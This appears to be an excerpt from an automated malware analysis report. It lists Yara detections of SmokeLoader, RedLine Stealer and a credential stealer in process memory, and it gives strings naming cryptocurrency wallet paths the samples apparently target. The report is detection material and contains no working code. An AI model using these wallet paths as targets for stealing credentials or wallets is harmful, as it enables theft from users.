Yara detected SmokeLoader
Source: Yara match File source: 00000017.00000002.879242303.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.725665133.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.713707724.00000000044C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.797092954.00000000006E1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.725720765.0000000000511000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.783710135.0000000002431000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.783461407.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.797009453.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.878602271.00000000005E0000.00000004.00000001.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 8039.exe, 00000016.00000002.950832258.0000000002990000.00000004.00000001.sdmp String found in binary or memory: ElectrumE#
Source: 8039.exe, 00000016.00000002.956933883.0000000002CF8000.00000004.00000001.sdmp String found in binary or memory: &l1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: 8039.exe, 00000016.00000002.950832258.0000000002990000.00000004.00000001.sdmp String found in binary or memory: JaxxE#
Source: 8039.exe, 00000016.00000002.947093100.0000000000B4B000.00000004.00000020.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\*.json
Source: 8039.exe, 00000016.00000002.956933883.0000000002CF8000.00000004.00000001.sdmp String found in binary or memory: %appdata%\Ethereum\wallets
Source: 8039.exe, 00000016.00000002.950832258.0000000002990000.00000004.00000001.sdmp String found in binary or memory: ExodusE#
Source: 8039.exe, 00000016.00000002.950832258.0000000002990000.00000004.00000001.sdmp String found in binary or memory: EthereumE#
Source: 8039.exe, 00000016.00000002.956933883.0000000002CF8000.00000004.00000001.sdmp String found in binary or memory: &l5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: 59B4.exe, 00000013.00000003.827286675.0000000002920000.00000004.00000001.sdmp String found in binary or memory: set_UseMachineKeyStore
Yara detected Credential Stealer
Source: Yara match File source: 00000016.00000002.953920982.0000000002B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8039.exe PID: 6032, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 27.2.610B.exe.36b5530.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.82DC.exe.3f36280.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.2600000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.2050000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.36b6418.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.82DC.exe.3f36280.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.8039.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.36b5530.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.8039.exe.4743790.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.8039.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.8039.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.36b6418.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.36d0f50.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.8039.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.2600000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.2050000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.8039.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.8039.exe.4729678.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.2050ee8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.2050ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.8039.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.8039.exe.4729678.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.21c0f6e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.21c0086.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.21c0f6e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.21c0086.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.36d0f50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.954434043.00000000036B5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.851440177.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.946993376.0000000002180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.941479001.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.917443337.0000000000720000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.860279815.00000000046F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.850675155.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.857126513.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.846233118.000000000115D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.853234726.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.950530750.0000000002600000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.946243879.0000000002050000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.948562304.0000000003EEF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8039.exe PID: 6032, type: MEMORYSTR
Yara detected SmokeLoader
Source: Yara match File source: 00000017.00000002.879242303.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.725665133.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.713707724.00000000044C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.797092954.00000000006E1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.725720765.0000000000511000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.783710135.0000000002431000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.783461407.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.797009453.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.878602271.00000000005E0000.00000004.00000001.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs